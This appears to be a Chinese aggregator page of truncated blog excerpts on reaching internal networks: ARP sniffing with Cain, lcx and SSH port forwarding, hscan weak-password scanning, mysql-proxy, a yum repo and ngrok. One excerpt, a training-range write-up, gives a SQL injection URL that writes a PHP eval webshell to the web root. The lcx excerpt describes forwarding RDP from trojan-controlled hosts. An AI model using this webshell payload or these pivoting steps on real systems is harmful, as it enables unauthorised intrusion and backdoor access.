满足arp的条件为:目标IP为动态IP(arp -a查看) 下载地址:cain4.9.zip 官网:http://www.oxid.it/cain.html 08专版:cain08安装版 把cain下载到服务器以后,要先安装补丁 WinPcap,然后再启动Cain4.9目录下的svchost.exe 也是一样简单的页面,配置如下: 选择网卡. 取消追踪路由的所有选项. 选择要嗅探的端口 然后来到嗅探器页面 先激活嗅探器,然后右击扫描MAC地址 这里可以设置扫描范围,我们就扫描所有吧 扫描结束后我…

http://www.jb51.net/hack/58514.html http://blog.chinaunix.net/uid-756931-id-353243.html http://blog.163.com/czg_e/blog/static/46104561201552423342331?ignoreua http://www.noah.org/wiki/SSH_tunnel http://www.myhack58.com/Article/60/63/2013/38396_3.htm…

国内的一些云主机平台(UCloud,阿里云,腾讯云等)走的都是网关机+内网机(即局域网)模式,网关机代理外网访问,不能直接连接内网机器.本文介绍通过远程登录云主机,并设置本地代理的方式,通过sqlyog远程连接内网mysql.1.所需工具putty.SocksCap64.SQLyog: 2.登录 (1)使用putty登录远程主机: 点击open,输入账号.密码: 鼠标右键,弹出的菜单点击Change Setting,设置设置本地转发端口: 选中D3306,应用: (2)使用SocksCap代理访…

功能 用于外网客户端连接内网的MySQL,将此工具安装在中转服务器上. 软件版本 mysql-proxy-0.8.1-linux-rhel5-x86-64bit.tar.gz 简单的配置过程 解压后有5个目录 bin include lib libexec share 进bin目录,查看mysql_proxy的使用帮助 [root@ora01 bin]# ./mysql-proxy --help-all Usage: mysql-proxy [OPTION...] - MySQL Proxy H…

0x01 简介 lcx是一款端口转发工具,有三个功能: 第一个功能将本地端口转发到远程主机某个端口上 第二个功能将本地端口转发到本地另一个端口上 第三个功能是进行监听并进行转发使用 Lcx使用的前提是在端口转发的时候需要一台公网服务器 Lcx程序多用于被控制计算机处于内网的时候,被控制机可能中了木马程序,虽然能够进行控制,但还是没有使用远程终端登录到本机进行管理方便,因此在很多情况下,都会想方设法在被控制计算机上开启3389端口,然后通过lcx等进行端口转发,进而在本地连接到被控制计算机的远程终…

使用yum的好处主要就是在于能够自动解决软件包之间的依赖.这使得维护更加容易.这篇文章主要就是记录部署内网源的操作过程以及yum工具如何使用 因为需要.数据库要从Oracle迁移至MySQL.在部署MySQL的时候也是内网.所以这里就需要解决源码编译MySQL时安装依赖包的工作.下面为操作过程 在yum中软件仓库的发布方式有多种.其中包括: FTP服务 :ftp://...... HTTP服务:http://...... 本地目录 :file://...... 一.服务端配置 1)准备软件仓库目…

前言 掌控安全里面的靶场内网渗透,练练手! 内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题 ①将shell.php写入网站根目录,payload http://afsgr16-b1ferw.aqlab.cn/?id=1.1 union select 1,"<?php eval($_REQUEST[gylq]);?>&…

这个工具以前使用的初衷是内网渗透,需要将内网ssh端口转发到外网服务器上.但这个工具同样适用于运维工程师进行远程内网维护. 当然这一切的前提是内网可以访问外网,检测方法当然就是直接ping 一个外网IP即可. 这个工具之前折腾了很久发现有点不稳定,断掉无法重新连接,昨晚重新调整了下命令参数总算可以正常使用,稳定性妥妥的. linux版lcx工具下载 linux版lcx端口转发2016.6.10 - 12.04 Kb lcx使用方法: Usage:./portmap -m method [-h1…

工具下载地址:hscan1.2.zip 界面简单,看配置: 这里我们主要需要配置的是模块和参数 模块,按照默认配置就行,取消 check HTTP vulnerability(漏洞检测) 会更快一点. 参数设置,改成你所拿到的服务器所在的网段. 接下来开始扫描: 已经在扫描了,并且扫描结束以后会给生成一份报告. 这是扫描到的弱口令 扫描报告. PS:hscan还提供mysql.exe可以直接点击连接来连接内网中的数据库.…

ngrok可以将内网映射到公网上,这样就可以在公网上访问你的网络服务. 该工具通常在进行app开发和微信开发时比较有用,这样就可避免在公网服务器上单独部署项目,通过映射,直接连接本地服务即可进行开发. 目前ngrok官网已被和谐掉,我们可访问 : http://natapp.cn/下载相应平台的ngrok 下载后,解压,运行 ngrok -config ngrok.cfg -subdomain myapp 80 myapp 自定义的域名, 80 为需要映射到的本机端口 运行成功如下图所示 : 使…